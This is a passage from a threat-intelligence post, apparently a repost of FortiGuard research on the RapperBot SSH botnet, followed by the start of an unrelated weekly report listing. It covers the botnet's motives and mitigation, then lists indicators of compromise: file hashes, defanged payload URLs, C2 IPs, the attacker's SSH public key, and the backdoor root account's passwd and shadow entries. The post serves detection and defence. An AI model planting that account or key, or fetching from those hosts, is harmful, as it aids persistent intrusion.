<p>FortiGuard Labs has been monitoring this threat for over a month. During that time, it has undergone several interesting changes that raise more questions than answers when attempting to pinpoint the primary motivation of the threat actors in launching this campaign. At one point, samples were observed where the DDoS attack capabilities were entirely removed and added back a week later. Could the DDoS functionality have been retained for masquerading as a typical DDoS botnet to avoid drawing too much attention? It is also possible that this whole campaign is still a work in progress. Additionally, self-propagation was removed after a few days in late June, with the current focus on aggressively retaining continued access to brute-forced SSH servers. Are the threat actors more interested in collecting compromised SSH devices than expanding their botnet? More important, analysts have not seen additional payloads delivered after brute forcing. One can only speculate on why the threat actors are amassing a rapidly growing collection of compromised SSH servers. Over 3,500 unique IPs have been observed in the past 1.5 months attempting to scan and brute-force SSH servers with the SSH-2.0-HELLOWORLD client identification string. IPs from the US, Taiwan, and South Korea comprised half of the observed IPs (Figure 4).</p>
<p><a href="{{#staticFileLink}}10779953662,RESIZE_584x{{/staticFileLink}}"><img class="align-full" src="{{#staticFileLink}}10779953662,RESIZE_400x{{/staticFileLink}}" width="400" alt="10779953662?profile=RESIZE_400x" /></a>Figure 4. Scanner Count from Mid-June to Mid-July 2022</p>
<p>Although this threat heavily borrows code from Mirai, it has features that set it apart from its predecessor and its variants. Its ability to persist in the victim system gives threat actors the flexibility to use them for any malicious purpose they desire. Due to some significant and curious changes that RapperBot has undergone, its primary motivation is still a bit of a mystery. Regardless, since its primary propagation method is brute forcing SSH credentials, this threat can easily be mitigated by setting strong passwords for devices or disabling password authentication for SSH (where possible).</p>
<p>Researchers from FortiGuard Labs will continue to monitor RapperBot’s development.</p>
<p>IOCs:</p>
<p><strong>Files</strong></p>
<p>92ae77e9dd22e7680123bb230ce43ef602998e6a1c6756d9e2ce5822a09b37b4<br /> a31f4caa0be9e588056c92fd69c8ac970ebc7e85a68615b1d9407a954d4df45d<br /> e8d06ac196c7852ff71c150b2081150be9996ff670550717127db8ab855175a8<br /> 23a415d0ec6d3131f1d537836d3c0449097e98167b18fbdbf2efca789748818a<br /> c83f318339e9c4072010b625d876558d14eaa0028339db9edf12bbcafe6828bb<br /> 05c78eaf32af9647f178dff981e6e4e43b1579d95ccd4f1c2f1436dbfa0727ad<br /> 88bbb772b8731296822646735aacbfb53014fbb7f90227b44523d7577e0a7ce6<br /> e8f1e8ec6b94ea54488d5f714e71e51d58dcdfe4be3827c55970d6f3b06edf73<br /> 23256f231f3d91b0136b44d649b924552607a29b43a195024dbe6cde5b4a28ad<br /> 77b2e5fb5b72493bde35a6b29a66e6250b6a5a0c9b9c5653957f64a12c793cd5<br /> dcdeedee4736ec528d1a30a585ec4a1a4f3462d6d25b71f6c1a4fef7f641e7ae<br /> ebb860512a55c1cdc8be1399eec44c4481aedb418f15dbda4612e6d38e9b9010<br /> 9d234e975e4df539a217d1c4386822be1f56cea35f7dd2aa606ae4995894da42<br /> 1975851c916587e057fa5862884cbac3fa1e80881ddd062392486f5390c86865<br /> 8380321c1bd250424a0a167e0f319511611f73b53736895a8d3a2ad58ffcd5d5<br /> f5ff9d1261af176d7ff1ef91aa8c892c70b40caa02c17a25de22539e9d0cdd26<br /> 2298071b6ba7baa5393be064876efcdbd9217c212e0c764ba62a6f0ffc83cc5a<br /> 2479932a6690f070fa344e5222e3fbb6ad9c880294d5b822d7a3ec27f1b8b8d5<br /> 1d5e6624a2ce55616ef078a72f25c9d71a3dbc0175522c0d8e07233115824f96<br /> 746106403a98aea357b80f17910b641db9c4fedbb3968e75d836e8b1d5712a62<br /> ddf5aff0485f395c7e6c3de868b15212129962b4b9c8040bef6679ad880e3f31<br /> e56edaa1e06403757e6e2362383d41db4e4453aafda144bb36080a1f1b899a02<br /> 55ff25b090dc1b380d8ca152428ba28ec14e9ef13a48b3fd162e965244b0d39b<br /> 8e9f87bb25ff83e4ad970366bba47afb838028f7028ea3a7c73c4d08906ec102<br /> d86d158778a90f6633b41a10e169b25e3cb1eb35b369a9168ec64b2d8b3cbeec<br /> ff09cf7dfd1dc1466815d4df098065510eec504099ebb02b830309067031fe04</p>
<p><strong>Download URLs</strong></p>
<p>hxxp://31[.]44[.]185[.]235/x86<br /> hxxp://31[.]44[.]185[.]235/mips<br /> hxxp://31[.]44[.]185[.]235/arm7<br /> hxxp://2[.]58[.]149[.]116/arm<br /> hxxp://2[.]58[.]149[.]116/spc<br /> hxxp://2[.]58[.]149[.]116/mips<br /> hxxp://2[.]58[.]149[.]116/x86_64<br /> hxxp://2[.]58[.]149[.]116/ssh/arm7<br /> hxxp://2[.]58[.]149[.]116/ssh/mips<br /> hxxp://2[.]58[.]149[.]116/ssh/x86<br /> hxxp://2[.]58[.]149[.]116/ssh/spc<br /> hxxp://194[.]31[.]98[.]244/ssh/new/spc<br /> hxxp://194[.]31[.]98[.]244/ssh/new/x86<br /> hxxp://194[.]31[.]98[.]244/ssh/new/mips<br /> hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br /> hxxp://194[.]31[.]98[.]244/ssh/new/arm<br /> hxxp://194[.]31[.]98[.]244/ssh/new/x86<br /> hxxp://194[.]31[.]98[.]244/ssh/new/mips<br /> hxxp://194[.]31[.]98[.]244/ssh/new/arm7<br /> hxxp://194[.]31[.]98[.]244/ssh/new/arm<br /> hxxp://185[.]225[.]73[.]196/ssh/new/arm<br /> hxxp://185[.]225[.]73[.]196/ssh/new/arm7<br /> hxxp://185[.]225[.]73[.]196/ssh/new/mips<br /> hxxp//185[.]225[.]73[.]196/ssh/new/x86</p>
<p><strong>C2</strong></p>
<p>31[.]44[.]185[.]235<br /> 2[.]58[.]149[.]116<br /> 194[.]31[.]98[.]244<br /> 185[.]225[.]73[.]196</p>
<p><strong>Threat Actor SSH public key</strong></p>
<p>AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJ GGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30 NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1 giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLD BAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==</p>
<p><strong>Threat Actor root user</strong></p>
<p>/etc /passwd suhelper:x:0:0::/:</p>
<p>/etc /shadow suhelper:$1$1OJBlhUV$E9DMK0xdoZb8W8wVOibPQ/:19185:0:99999:7:::</p>
<p>We would like to thank the Fortinet researchers for their continued collection and analysis. Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs. com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: <a href="https://www.redskyalliance.org/">https://www. redskyalliance. org/</a></li>
<li>Website: <a href="https://www.wapacklabs.com/">https://www. wapacklabs. com/</a></li>
<li>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www. linkedin. com/company/64265941</a> </li>
</ul>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery/">https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery/</a></p></div>Weekly Cyber Intel Report - All Sector 08 12 2022https://redskyalliance.org/xindustry/weekly-cyber-intel-report-all-sector-08-12-20222022-08-12T12:52:11.000Z2022-08-12T12:52:11.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><h2><a href="{{#staticFileLink}}10764228452,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}10764228452,RESIZE_400x{{/staticFileLink}}" alt="10764228452?profile=RESIZE_400x" width="200" /></a><span style="font-size:12pt;">Activity Summary - Week Ending on 12 August 2022</span>:</h2>
<ul>
<li>Red Sky Alliance identified 23,968 connections from new IP’s checking in with our Sinkholes</li>
<li>ril.com Hit</li>
<li>Analysts identified 765 new IP addresses participating in various Botnets</li>
<li>Zeppelin Ransomware</li>
<li>Exim</li>
<li>SmokeLoader</li>
<li>RapperBot</li>
<li>AiTM Phishing</li>
<li>BlenderBot</li>
<li>PortDoor & CotSam</li>
</ul>
<p>Link to full report: <a href="{{#staticFileLink}}10764227096,original{{/staticFileLink}}">IR-22-224-001_weekly224.pdf</a></p></div>